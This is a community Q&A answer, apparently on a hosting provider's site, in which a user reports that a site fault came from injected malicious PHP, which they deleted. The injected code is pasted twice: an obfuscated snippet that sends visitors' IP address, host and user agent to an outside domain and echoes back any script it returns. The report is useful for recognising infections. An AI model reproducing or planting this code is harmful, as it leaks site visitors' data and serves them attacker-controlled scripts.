Scale up as you grow — whether you're running one virtual machine or ten thousand.

From GPU-powered inference and Kubernetes to managed databases and storage, get everything you need to build, scale, and deploy intelligent applications.

This textbox defaults to using Markdown to format your answer.
You can type !ref in this text area to quickly search our full set of tutorials, documentation & marketplace offerings and insert the link!
These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.
This question was answered by @guillefd:
Well, finally the reason of this issue: code injection. After deleting all the malicious code, all worked fine again.
This was the code injected:
#19f955# error_reporting(0); ini_set('display_errors',0); $wp_p26 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_p26) && !preg_match ('/bot/i', $wp_p26))){ $wp_p0926="http://"."tag"."includes".".com/includes"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_p26); $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_p0926); curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_26p = curl_exec ($ch); curl_close($ch);} if ( substr($wp_26p,1,3) === 'scr' ){ echo $wp_26p; } #/19f955#
You can see the comment here.
This question was answered by @guillefd:
Well, finally the reason of this issue: code injection. After deleting all the malicious code, all worked fine again.
This was the code injected:
#19f955# error_reporting(0); ini_set('display_errors',0); $wp_p26 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_p26) && !preg_match ('/bot/i', $wp_p26))){ $wp_p0926="http://"."tag"."includes".".com/includes"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_p26); $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_p0926); curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_26p = curl_exec ($ch); curl_close($ch);} if ( substr($wp_26p,1,3) === 'scr' ){ echo $wp_26p; } #/19f955#